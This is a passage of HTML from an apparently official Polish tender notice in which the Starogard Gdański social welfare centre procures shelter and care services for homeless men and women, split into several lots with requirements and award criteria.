<h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">odległość schroniska od siedziby Zamawiającego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest świadczenie usług schronienia dla 5 bezdomnych mężczyzn (z możliwością zwiększenia liczby osób skierowanych o 3 osoby) z terenu miasta Starogard Gdański w zakresie pomocy społecznej polegającej na udzieleniu tymczasowego schronienia i innych usług zgodnie z art. 48 i 48a ustawy z dnia 12 marca 2014r. o pomocy społecznej (Dz. U. z 2020 poz. 1876 ze zm.)<br/> 3.	Wymagania Osoby, którym ma być udzielone schronienie będą umieszczane w schroniskach po wcześniejszym ustaleniu terminu, na podstawie imiennego skierowania wystawionego przez Miejski Ośrodek Pomocy Społecznej w Starogardzie Gdańskim. W szczególnie uzasadnionych przypadkach dopuszcza się podjęcie świadczenia usług w oparciu o dane przekazane faksem, telefonicznie lub e-mailem. W szczególnych przypadkach dopuszcza się, że Kierownik ustala skierowanie telefonicznie, a dokumentacja jest uzupełniona w ciągu 2 dni roboczych.<br/> 4.	Schronisko powinno:<br/>a)	świadczyć schronienie całodobowo,<br/>b)	prowadzić rejestr osób korzystających z pomocy placówki, skierowanych przez Miejski Ośrodek Pomocy Społecznej w Starogardzie Gdańskim,<br/>c)	realizować pracę socjalną, w tym indywidualne programy wychodzenia z bezdomności,<br/>d)	zapewnić:<br/>•	trzy posiłki dziennie w tym jeden gorący dla osób dorosłych, dla dzieci dodatkowo czwarty posiłek: podwieczorek;<br/>•	podstawowe środki higieny osobistej, zmianę odzieży na czystą oraz możliwość wyprania brudnej odzieży i wysuszenia;<br/>•	dezynfekcję i dezynsekcję odzieży w przypadku braku możliwości jej wymiany;<br/>•	właściwe warunki socjalno-bytowe i nieskrępowany dostęp do pomieszczeń sanitarnych;<br/>•	kontakt z lekarzem pierwszego kontaktu i placówkami ochrony zdrowia, leki przeciwbólowe i przeciw przeziębieniu;<br/>•	poczucie bezpieczeństwa na terenie placówki, poszanowanie godności osobistej; <br/>•	informacje o dostępnych formach pomocy społecznej, a w razie potrzeby wsparcie w jej zorganizowaniu;<br/>•	pomoc prawną i psychologiczną;<br/>e)	współpracować z MOPS w realizacji indywidualnych programów wychodzenia z bezdomności.<br/>f)	nie później niż 3 dni od zdarzenia, pisemnie informować o:<br/>•	usunięciu osoby bezdomnej z placówki z podaniem uzasadnienia,<br/>•	opuszczeniu przez osobę bezdomną schroniska.<br/> 6.	Placówki świadczące wyżej wymienione wsparcie dla osób bezdomnych powinny spełniać standardy określone w Rozporządzeniu Ministra Rodziny, Pracy i Polityki Społecznej z dnia 27 kwietnia 2018r. w sprawie minimalnych standardów noclegowni, schronisk dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni (Dz. U. z 2018r. poz. 896), zwanym dalej Rozporządzeniem.<br/> 7.	Zamawiający zastrzega, że podana liczba osób, które zostaną skierowane do schroniska wraz z możliwością zwiększenia tej liczby ma charakter szacunkowy i jest efektem dokonanej przez Zamawiającego analizy na podstawie lat ubiegłych. Faktyczna liczba osób, które zostaną skierowane do schroniska dla osób bezdomnych może się różnić od liczb wskazanych w ust. 2. Zamawiający zastrzega sobie prawo niewyczerpania całego zakresu przedmiotu zamówienia jak i jego zwiększenia w zależności od potrzeb Zamawiającego oraz możliwości Wykonawcy.<br/> 8.	Zamawiający dopuszcza możliwość dodania do wzoru umowy jako załącznik regulaminu obowiązującego w schronisku pod warunkiem, że jego zapisy nie stoją w sprzeczności z postanowieniami umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311000-2 - Usługi opieki społecznej obejmujące miejsca noclegowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-07-01 do 2024-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">odległość schroniska od siedziby Zamawiającego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest świadczenie usług schronienia dla 2 bezdomnych mężczyzn (z możliwością zwiększenia liczby osób skierowanych o jeną osobę) z terenu miasta Starogard Gdański w zakresie pomocy społecznej polegającej na udzieleniu tymczasowego schronienia i innych usług zgodnie z art. 48 i 48a ustawy z dnia 12 marca 2014r. o pomocy społecznej (Dz. U. z 2020 poz. 1876 ze zm.)<br/> 3.	Wymagania Osoby, którym ma być udzielone schronienie będą umieszczane w schroniskach po wcześniejszym ustaleniu terminu, na podstawie imiennego skierowania wystawionego przez Miejski Ośrodek Pomocy Społecznej w Starogardzie Gdańskim. W szczególnie uzasadnionych przypadkach dopuszcza się podjęcie świadczenia usług w oparciu o dane przekazane faksem, telefonicznie lub e-mailem. W szczególnych przypadkach dopuszcza się, że Kierownik ustala skierowanie telefonicznie, a dokumentacja jest uzupełniona w ciągu 2 dni roboczych.<br/> 4.	Schronisko powinno:<br/>a)	świadczyć schronienie całodobowo,<br/>b)	prowadzić rejestr osób korzystających z pomocy placówki, skierowanych przez Miejski Ośrodek Pomocy Społecznej w Starogardzie Gdańskim,<br/>c)	realizować pracę socjalną, w tym indywidualne programy wychodzenia z bezdomności,<br/>d)	zapewnić:<br/>•	trzy posiłki dziennie w tym jeden gorący dla osób dorosłych, dla dzieci dodatkowo czwarty posiłek: podwieczorek;<br/>•	podstawowe środki higieny osobistej, zmianę odzieży na czystą oraz możliwość wyprania brudnej odzieży i wysuszenia;<br/>•	dezynfekcję i dezynsekcję odzieży w przypadku braku możliwości jej wymiany;<br/>•	właściwe warunki socjalno-bytowe i nieskrępowany dostęp do pomieszczeń sanitarnych;<br/>•	kontakt z lekarzem pierwszego kontaktu i placówkami ochrony zdrowia, leki przeciwbólowe i przeciw przeziębieniu;<br/>•	poczucie bezpieczeństwa na terenie placówki, poszanowanie godności osobistej; <br/>•	informacje o dostępnych formach pomocy społecznej, a w razie potrzeby wsparcie w jej zorganizowaniu;<br/>•	pomoc prawną i psychologiczną;<br/>e)	współpracować z MOPS w realizacji indywidualnych programów wychodzenia z bezdomności.<br/>f)	nie później niż 3 dni od zdarzenia, pisemnie informować o:<br/>•	usunięciu osoby bezdomnej z placówki z podaniem uzasadnienia,<br/>•	opuszczeniu przez osobę bezdomną schroniska.<br/> 6.	Placówki świadczące wyżej wymienione wsparcie dla osób bezdomnych powinny spełniać standardy określone w Rozporządzeniu Ministra Rodziny, Pracy i Polityki Społecznej z dnia 27 kwietnia 2018r. w sprawie minimalnych standardów noclegowni, schronisk dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni (Dz. U. z 2018r. poz. 896), zwanym dalej Rozporządzeniem.<br/> 7.	Zamawiający zastrzega, że podana liczba osób, które zostaną skierowane do schroniska wraz z możliwością zwiększenia tej liczby ma charakter szacunkowy i jest efektem dokonanej przez Zamawiającego analizy na podstawie lat ubiegłych. Faktyczna liczba osób, które zostaną skierowane do schroniska dla osób bezdomnych może się różnić od liczb wskazanych w ust. 2. Zamawiający zastrzega sobie prawo niewyczerpania całego zakresu przedmiotu zamówienia jak i jego zwiększenia w zależności od potrzeb Zamawiającego oraz możliwości Wykonawcy.<br/> 8.	Zamawiający dopuszcza możliwość dodania do wzoru umowy jako załącznik regulaminu obowiązującego w schronisku pod warunkiem, że jego zapisy nie stoją w sprzeczności z postanowieniami umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311000-2 - Usługi opieki społecznej obejmujące miejsca noclegowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-07-01 do 2024-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">odległość schroniska od siedziby Zamawiającego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest świadczenie usług schronienia dla 3 bezdomnych kobiet (z możliwością zwiększenia liczby osób skierowanych o 2 osoby) z terenu miasta Starogard Gdański w zakresie pomocy społecznej polegającej na udzieleniu tymczasowego schronienia i innych usług zgodnie z art. 48 i 48a ustawy z dnia 12 marca 2014r. o pomocy społecznej (Dz. U. z 2020 poz. 1876 ze zm.)<br/> 3.	Wymagania Osoby, którym ma być udzielone schronienie będą umieszczane w schroniskach po wcześniejszym ustaleniu terminu, na podstawie imiennego skierowania wystawionego przez Miejski Ośrodek Pomocy Społecznej w Starogardzie Gdańskim. W szczególnie uzasadnionych przypadkach dopuszcza się podjęcie świadczenia usług w oparciu o dane przekazane faksem, telefonicznie lub e-mailem. W szczególnych przypadkach dopuszcza się, że Kierownik ustala skierowanie telefonicznie, a dokumentacja jest uzupełniona w ciągu 2 dni roboczych.<br/> 4.	Schronisko powinno:<br/>a)	świadczyć schronienie całodobowo,<br/>b)	prowadzić rejestr osób korzystających z pomocy placówki, skierowanych przez Miejski Ośrodek Pomocy Społecznej w Starogardzie Gdańskim,<br/>c)	realizować pracę socjalną, w tym indywidualne programy wychodzenia z bezdomności,<br/>d)	zapewnić:<br/>•	trzy posiłki dziennie w tym jeden gorący dla osób dorosłych, dla dzieci dodatkowo czwarty posiłek: podwieczorek;<br/>•	podstawowe środki higieny osobistej, zmianę odzieży na czystą oraz możliwość wyprania brudnej odzieży i wysuszenia;<br/>•	dezynfekcję i dezynsekcję odzieży w przypadku braku możliwości jej wymiany;<br/>•	właściwe warunki socjalno-bytowe i nieskrępowany dostęp do pomieszczeń sanitarnych;<br/>•	kontakt z lekarzem pierwszego kontaktu i placówkami ochrony zdrowia, leki przeciwbólowe i przeciw przeziębieniu;<br/>•	poczucie bezpieczeństwa na terenie placówki, poszanowanie godności osobistej; <br/>•	informacje o dostępnych formach pomocy społecznej, a w razie potrzeby wsparcie w jej zorganizowaniu;<br/>•	pomoc prawną i psychologiczną;<br/>e)	współpracować z MOPS w realizacji indywidualnych programów wychodzenia z bezdomności.<br/>f)	nie później niż 3 dni od zdarzenia, pisemnie informować o:<br/>•	usunięciu osoby bezdomnej z placówki z podaniem uzasadnienia,<br/>•	opuszczeniu przez osobę bezdomną schroniska.<br/> 6.	Placówki świadczące wyżej wymienione wsparcie dla osób bezdomnych powinny spełniać standardy określone w Rozporządzeniu Ministra Rodziny, Pracy i Polityki Społecznej z dnia 27 kwietnia 2018r. w sprawie minimalnych standardów noclegowni, schronisk dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni (Dz. U. z 2018r. poz. 896), zwanym dalej Rozporządzeniem.<br/> 7.	Zamawiający zastrzega, że podana liczba osób, które zostaną skierowane do schroniska wraz z możliwością zwiększenia tej liczby ma charakter szacunkowy i jest efektem dokonanej przez Zamawiającego analizy na podstawie lat ubiegłych. Faktyczna liczba osób, które zostaną skierowane do schroniska dla osób bezdomnych może się różnić od liczb wskazanych w ust. 2. Zamawiający zastrzega sobie prawo niewyczerpania całego zakresu przedmiotu zamówienia jak i jego zwiększenia w zależności od potrzeb Zamawiającego oraz możliwości Wykonawcy.<br/> 8.	Zamawiający dopuszcza możliwość dodania do wzoru umowy jako załącznik regulaminu obowiązującego w schronisku pod warunkiem, że jego zapisy nie stoją w sprzeczności z postanowieniami umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311000-2 - Usługi opieki społecznej obejmujące miejsca noclegowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-07-01 do 2024-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">odległość schroniska od siedziby Zamawiającego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest świadczenie usług schronienia wraz z usługami opiekuńczymi dla 6 bezdomnych mężczyzn (z możliwością zwiększenia liczby osób skierowanych o 3 osoby) z terenu miasta Starogard Gdański w zakresie pomocy społecznej polegającej na udzieleniu tymczasowego schronienia i innych usług zgodnie z art. 48 i 48a ustawy z dnia 12 marca 2014r. o pomocy społecznej (Dz. U. z 2020 poz. 1876 ze zm.)<br/> 3.	Wymagania Osoby, którym ma być udzielone schronienie będą umieszczane w schroniskach po wcześniejszym ustaleniu terminu, na podstawie imiennego skierowania wystawionego przez Miejski Ośrodek Pomocy Społecznej w Starogardzie Gdańskim. W szczególnie uzasadnionych przypadkach dopuszcza się podjęcie świadczenia usług w oparciu o dane przekazane faksem, telefonicznie lub e-mailem. W szczególnych przypadkach dopuszcza się, że Kierownik ustala skierowanie telefonicznie, a dokumentacja jest uzupełniona w ciągu 2 dni roboczych.<br/> 4.	Schronisko powinno:<br/>a)	świadczyć schronienie całodobowo,<br/>b)	prowadzić rejestr osób korzystających z pomocy placówki, skierowanych przez Miejski Ośrodek Pomocy Społecznej w Starogardzie Gdańskim,<br/>c)	realizować pracę socjalną, w tym indywidualne programy wychodzenia z bezdomności,<br/>d)	zapewnić:<br/>•	trzy posiłki dziennie w tym jeden gorący dla osób dorosłych, dla dzieci dodatkowo czwarty posiłek: podwieczorek;<br/>•	podstawowe środki higieny osobistej, zmianę odzieży na czystą oraz możliwość wyprania brudnej odzieży i wysuszenia;<br/>•	dezynfekcję i dezynsekcję odzieży w przypadku braku możliwości jej wymiany;<br/>•	właściwe warunki socjalno-bytowe i nieskrępowany dostęp do pomieszczeń sanitarnych;<br/>•	kontakt z lekarzem pierwszego kontaktu i placówkami ochrony zdrowia, leki przeciwbólowe i przeciw przeziębieniu;<br/>•	poczucie bezpieczeństwa na terenie placówki, poszanowanie godności osobistej; <br/>•	informacje o dostępnych formach pomocy społecznej, a w razie potrzeby wsparcie w jej zorganizowaniu;<br/>•	pomoc prawną i psychologiczną;<br/>e)	współpracować z MOPS w realizacji indywidualnych programów wychodzenia z bezdomności.<br/>f)	nie później niż 3 dni od zdarzenia, pisemnie informować o:<br/>•	usunięciu osoby bezdomnej z placówki z podaniem uzasadnienia,<br/>•	opuszczeniu przez osobę bezdomną schroniska.<br/> 5.	Usługi schronienia dla bezdomnych z usługami opiekuńczymi:<br/>a)	umożliwienie spożycia posiłku w pokoju mieszkalnym, a w razie potrzeby – karmienie, <br/>b)	w miarę potrzeby pomoc w myciu, kąpaniu i ubieraniu, <br/>c)	Opieka higieniczna. Zapewnienie usług opiekuńczych w wydzielonym pomieszczeniu lub w pokoju mieszkalnym, jeżeli łóżko jest oddzielone zasłoną, <br/>d)	niezbędna pomoc w załatwieniu spraw osobistych, <br/>e)	zapewnienie pomocy w korzystaniu ze świadczeń zdrowotnych przysługujących na podstawie odrębnych przepisów.<br/>f)	współpracować z MOPS Starogard Gdański w realizacji kontraktów socjalnych i indywidualnych programów wychodzenia z bezdomności.<br/>g)	nie później niż 3 dni od zdarzenia pisemnie informować o:<br/>•	usunięciu osoby bezdomnej z placówki z podaniem uzasadnienia,<br/>•	opuszczeniu przez osobę bezdomną schroniska.<br/> 6.	Placówki świadczące wyżej wymienione wsparcie dla osób bezdomnych powinny spełniać standardy określone w Rozporządzeniu Ministra Rodziny, Pracy i Polityki Społecznej z dnia 27 kwietnia 2018r. w sprawie minimalnych standardów noclegowni, schronisk dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni (Dz. U. z 2018r. poz. 896), zwanym dalej Rozporządzeniem.<br/> 7.	Zamawiający zastrzega, że podana liczba osób, które zostaną skierowane do schroniska wraz z możliwością zwiększenia tej liczby ma charakter szacunkowy i jest efektem dokonanej przez Zamawiającego analizy na podstawie lat ubiegłych. Faktyczna liczba osób, które zostaną skierowane do schroniska dla osób bezdomnych może się różnić od liczb wskazanych w ust. 2. Zamawiający zastrzega sobie prawo niewyczerpania całego zakresu przedmiotu zamówienia jak i jego zwiększenia w zależności od potrzeb Zamawiającego oraz możliwości Wykonawcy.<br/> 8.	Zamawiający dopuszcza możliwość dodania do wzoru umowy jako załącznik regulaminu obowiązującego w schronisku pod warunkiem, że jego zapisy nie stoją w sprzeczności z postanowieniami umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311000-2 - Usługi opieki społecznej obejmujące miejsca noclegowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-07-01 do 2024-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">odległość schroniska od siedziby Zamawiającego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest świadczenie usług schronienia wraz z usługami opiekuńczymi dla 4 bezdomnych mężczyzn (z możliwością zwiększenia liczby osób skierowanych o 2 osoby) z terenu miasta Starogard Gdański w zakresie pomocy społecznej polegającej na udzieleniu tymczasowego schronienia i innych usług zgodnie z art. 48 i 48a ustawy z dnia 12 marca 2014r. o pomocy społecznej (Dz. U. z 2020 poz. 1876 ze zm.)<br/> 3.	Wymagania Osoby, którym ma być udzielone schronienie będą umieszczane w schroniskach po wcześniejszym ustaleniu terminu, na podstawie imiennego skierowania wystawionego przez Miejski Ośrodek Pomocy Społecznej w Starogardzie Gdańskim. W szczególnie uzasadnionych przypadkach dopuszcza się podjęcie świadczenia usług w oparciu o dane przekazane faksem, telefonicznie lub e-mailem. W szczególnych przypadkach dopuszcza się, że Kierownik ustala skierowanie telefonicznie, a dokumentacja jest uzupełniona w ciągu 2 dni roboczych.<br/> 4.	Schronisko powinno:<br/>a)	świadczyć schronienie całodobowo,<br/>b)	prowadzić rejestr osób korzystających z pomocy placówki, skierowanych przez Miejski Ośrodek Pomocy Społecznej w Starogardzie Gdańskim,<br/>c)	realizować pracę socjalną, w tym indywidualne programy wychodzenia z bezdomności,<br/>d)	zapewnić:<br/>•	trzy posiłki dziennie w tym jeden gorący dla osób dorosłych, dla dzieci dodatkowo czwarty posiłek: podwieczorek;<br/>•	podstawowe środki higieny osobistej, zmianę odzieży na czystą oraz możliwość wyprania brudnej odzieży i wysuszenia;<br/>•	dezynfekcję i dezynsekcję odzieży w przypadku braku możliwości jej wymiany;<br/>•	właściwe warunki socjalno-bytowe i nieskrępowany dostęp do pomieszczeń sanitarnych;<br/>•	kontakt z lekarzem pierwszego kontaktu i placówkami ochrony zdrowia, leki przeciwbólowe i przeciw przeziębieniu;<br/>•	poczucie bezpieczeństwa na terenie placówki, poszanowanie godności osobistej; <br/>•	informacje o dostępnych formach pomocy społecznej, a w razie potrzeby wsparcie w jej zorganizowaniu;<br/>•	pomoc prawną i psychologiczną;<br/>e)	współpracować z MOPS w realizacji indywidualnych programów wychodzenia z bezdomności.<br/>f)	nie później niż 3 dni od zdarzenia, pisemnie informować o:<br/>•	usunięciu osoby bezdomnej z placówki z podaniem uzasadnienia,<br/>•	opuszczeniu przez osobę bezdomną schroniska.<br/> 5.	Usługi schronienia dla bezdomnych z usługami opiekuńczymi:<br/>a)	umożliwienie spożycia posiłku w pokoju mieszkalnym, a w razie potrzeby – karmienie, <br/>b)	w miarę potrzeby pomoc w myciu, kąpaniu i ubieraniu, <br/>c)	Opieka higieniczna. Zapewnienie usług opiekuńczych w wydzielonym pomieszczeniu lub w pokoju mieszkalnym, jeżeli łóżko jest oddzielone zasłoną, <br/>d)	niezbędna pomoc w załatwieniu spraw osobistych, <br/>e)	zapewnienie pomocy w korzystaniu ze świadczeń zdrowotnych przysługujących na podstawie odrębnych przepisów.<br/>f)	współpracować z MOPS Starogard Gdański w realizacji kontraktów socjalnych i indywidualnych programów wychodzenia z bezdomności.<br/>g)	nie później niż 3 dni od zdarzenia pisemnie informować o:<br/>•	usunięciu osoby bezdomnej z placówki z podaniem uzasadnienia,<br/>•	opuszczeniu przez osobę bezdomną schroniska.<br/> 6.	Placówki świadczące wyżej wymienione wsparcie dla osób bezdomnych powinny spełniać standardy określone w Rozporządzeniu Ministra Rodziny, Pracy i Polityki Społecznej z dnia 27 kwietnia 2018r. w sprawie minimalnych standardów noclegowni, schronisk dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni (Dz. U. z 2018r. poz. 896), zwanym dalej Rozporządzeniem.<br/> 7.	Zamawiający zastrzega, że podana liczba osób, które zostaną skierowane do schroniska wraz z możliwością zwiększenia tej liczby ma charakter szacunkowy i jest efektem dokonanej przez Zamawiającego analizy na podstawie lat ubiegłych. Faktyczna liczba osób, które zostaną skierowane do schroniska dla osób bezdomnych może się różnić od liczb wskazanych w ust. 2. Zamawiający zastrzega sobie prawo niewyczerpania całego zakresu przedmiotu zamówienia jak i jego zwiększenia w zależności od potrzeb Zamawiającego oraz możliwości Wykonawcy.<br/> 8.	Zamawiający dopuszcza możliwość dodania do wzoru umowy jako załącznik regulaminu obowiązującego w schronisku pod warunkiem, że jego zapisy nie stoją w sprzeczności z postanowieniami umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311000-2 - Usługi opieki społecznej obejmujące miejsca noclegowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-07-01 do 2024-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">odległość schroniska od siedziby Zamawiającego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest świadczenie usług schronienia wraz z usługami opiekuńczymi dla 4 bezdomnych kobiet (z możliwością zwiększenia liczby osób skierowanych o 2 osoby) z terenu miasta Starogard Gdański w zakresie pomocy społecznej polegającej na udzieleniu tymczasowego schronienia i innych usług zgodnie z art. 48 i 48a ustawy z dnia 12 marca 2014r. o pomocy społecznej (Dz. U. z 2020 poz. 1876 ze zm.)<br/> 3.	Wymagania Osoby, którym ma być udzielone schronienie będą umieszczane w schroniskach po wcześniejszym ustaleniu terminu, na podstawie imiennego skierowania wystawionego przez Miejski Ośrodek Pomocy Społecznej w Starogardzie Gdańskim. W szczególnie uzasadnionych przypadkach dopuszcza się podjęcie świadczenia usług w oparciu o dane przekazane faksem, telefonicznie lub e-mailem. W szczególnych przypadkach dopuszcza się, że Kierownik ustala skierowanie telefonicznie, a dokumentacja jest uzupełniona w ciągu 2 dni roboczych.<br/> 4.	Schronisko powinno:<br/>a)	świadczyć schronienie całodobowo,<br/>b)	prowadzić rejestr osób korzystających z pomocy placówki, skierowanych przez Miejski Ośrodek Pomocy Społecznej w Starogardzie Gdańskim,<br/>c)	realizować 